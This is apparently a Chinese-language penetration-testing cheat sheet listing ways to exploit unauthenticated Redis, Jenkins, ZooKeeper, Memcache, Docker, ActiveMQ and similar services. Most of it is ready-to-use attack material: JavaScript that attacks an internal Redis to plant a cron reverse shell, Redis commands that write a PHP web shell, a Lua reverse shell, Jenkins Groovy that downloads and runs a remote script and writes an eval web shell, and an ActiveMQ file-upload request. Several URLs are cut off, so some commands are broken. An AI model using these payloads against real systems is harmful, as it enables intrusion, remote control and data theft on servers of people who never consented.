Redis
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| >redis-cli -h 127.0.0.1 flunshall
192.168.0.110:6379>ping
PONG 存在未授权访问
JS打内网
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('flushall\r\n');
var cmd =new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('eval \'' + 'redis.call(\"set\",\"1\",\"\\n\\n*/1 * * * * /bin/bash -i >&/dev/tcp/外网IP/5566 0>&1\\n\\n");redis.call(\"config\", \"set\", \"dir\",\"/var/spool/cron/\"); redis.call(\"config\",\"set\", \"dbfilename\", \"root\");' + '\' 0' +"\r\n");
var cmd =new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('save\r\n');
反弹shell
写shell
6379> config set dir /var/www/html/
6379> config set dbfilename shell.php
6379> set x "<?php phpinfo();?>"
6379> save
Lua RCE
https:
修改redis_lua.py里的 host 为目标 IP
执行返回正常,反弹shell
>eval "tonumber('/bin/bash -i >& /dev/tcp/192.168.0.108/12345 0>&1', 8)" 0
|
Jenkins未授权访问
1
2
3
4
5
6
7
8
9
10
11
12
| http:
http:
执行命令
>println "ifconfig -a".execute().text
反弹shell
>println "wget http://your.com/back.py -P /tmp/".execute().text
>println "python /tmp/back.py yourIP 8080".execute().text
写shell
>println "wget http://your.com/t.txt -o /var/www/html/1.php".execute().text
>new File("/var/www/html/1.php").write('<?php @eval($_POST[1]);? >');
>def webshell = '<?php @eval($_POST[1]);?>'
>new File("/var/www/html/1.php").write("$webshell");
|
MongoDB未授权访问
默认端口27017直接连接进行增删改查
ZooKeeper未授权访问
1
2
3
4
5
| 默认端口2181
获得服务器环境信息
>echo envi|nc 192.168.0.1 2181
连接
>./zkCli.sh -server ip:port
|
Elasticsearch未授权访问
1
2
3
4
5
| 默认端口9200
http:
http:
http:
http:
|
Memcache未授权访问
1
2
3
| 默认端口11211
>telnet 1.1.1.1 11211
>nc -vv 1.1.1.1 11211
|
Hadoop未授权访问
默认端口50070
Docker未授权访问
1
2
3
4
| 默认端口2375
>docker -H tcp:
默认密码
admin/shipyard
|
ActiveMQ未授权访问
1
2
3
4
5
6
| 默认端口8161
http:
PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0
Content-Length: 27
Host: 1.1.1.1:8161
Connection: Close Authorization: Basic YWRtaW46YWRtaW4= 123123123123123123123123123
|